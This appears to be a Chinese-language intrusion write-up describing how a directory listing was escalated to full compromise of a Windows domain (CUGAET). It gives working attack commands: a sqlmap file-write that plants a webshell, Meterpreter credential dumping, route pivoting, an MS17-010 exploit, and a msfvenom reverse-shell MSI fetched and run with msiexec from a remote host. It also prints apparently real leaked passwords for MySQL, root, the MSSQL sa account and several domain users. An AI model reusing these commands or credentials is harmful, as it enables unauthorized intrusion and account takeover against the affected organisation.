目录浏览致域沦陷

目录浏览引发的血案

漏洞

目录浏览
phpinfo.php
mysql密码泄漏
phpmyadmin

目录泄漏，到处查看文件，其中一个配置文件里面找到了一个mysql用户及密码

http://xxxx:8880/inc/func/mysql.inc

$conn_local=db_connect('localhost','nik','niknik','cugaet');

phpmyadmin 能登录，

http://xxxx:8880/phpmyadmin

登录以后发现为dba，i结合phpinfo泄漏的路径可以直接写shell，顺便查看root密码02061978

sqlmap -d mysql://nik:niknik@xxxx:3306/mysql --file-write=/root/webshell/shell.php  --file-dest=C:/xampp/htdocs/shell.php

菜刀链接以后开始信息收集

找到了mssql sa密码

C:/wamp/www/automatic_oop/gubo/load.php

xxxxx:1433 - Login Successful: WORKSTATION\sa:57835783

权限也比较高，

上传msf监听，getsystem，load-kiwi

导出密码

Username Domain Password


(null) (null) (null)
OBLAST$ CUGAET 7c e4 ed b0 4a 2e 9e 59 a4 d6 79 5d 15 ae e9 70 49 9e ee 82 5a 96 3b 45 fb 2d a5 56 a8 cf 97 b9 c9 8b e4 12 fb 49 d6 d2 a7 6b 81 6c 64 ed 9e dc b8 72 dc 8b 13 34 53 e0 c9 3c f4 3c cc ba ce 20 59 61 be 6a 72 00 fa b2 b8 1f c5 e9 04 64 73 9b ae d8 94 6a 4e 91 40 2d a8 0f 34 64 2b 8d e0 c4 fe 78 45 b9 b0 de 0a 12 fe eb 1f fc b2 73 e5 75 1f 25 e0 88 b4 b1 9e b2 e6 08 77 71 ff 05 af 01 e0 95 c1 54 bf 3d 0f 6a f3 c4 b6 70 5b b2 b4 36 b7 29 28 2e 39 50 a0 1d 5a 28 21 1d 21 a4 4e c7 63 e1 cc 36 14 6c cb 8e bc 76 40 15 26 e3 79 44 bc d2 4f a3 99 7b fa c7 22 2f 8e 0d bf c3 e8 eb e1 43 b7 7e 47 52 1e 10 db 79 4f 32 84 15 9a 68 8b a8 c6 f5 89 f5 70 fc 63 9b e6 cc f4 7c 91 ca c5 dd 3d f7 e6 21 0d 10 c9 23 1a 1d ce 34 55 03
akimova-na CUGAET 123
degur CUGAET specialist
nikolai CUGAET Thor!$go2
slava CUGAET t34ss220

tspkg credentials

Username Domain Password

---

akimova-na CUGAET 123
degur CUGAET specialist
nikolai CUGAET Thor!$go2
slava CUGAET t34ss220

arp -a获取一部分内网ip，提取ip，

route add 192.168.2.1/24 1

添加路由

据上面判断有域
图 0
图 1

ms17-010扫描一波
图 2

域控制器DC，datacenter 存在17-010

dc目标为x86不能直接用msf的17-010，所以通过 admin/smb/ms17_010_command 来执行命令

生成一个msi，然后下载执行，

msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=xxxx lport=port rc4password=xxx -f msi > xxx.msi

msf 设置好监听 Exploit: multi/handler windows/meterpreter/reverse_tcp_rc4

设置需要执行的命令

set command msiexec /qn /i http://xxx/xxx.msi

run

至此拿下域Dc，导出域内用户hash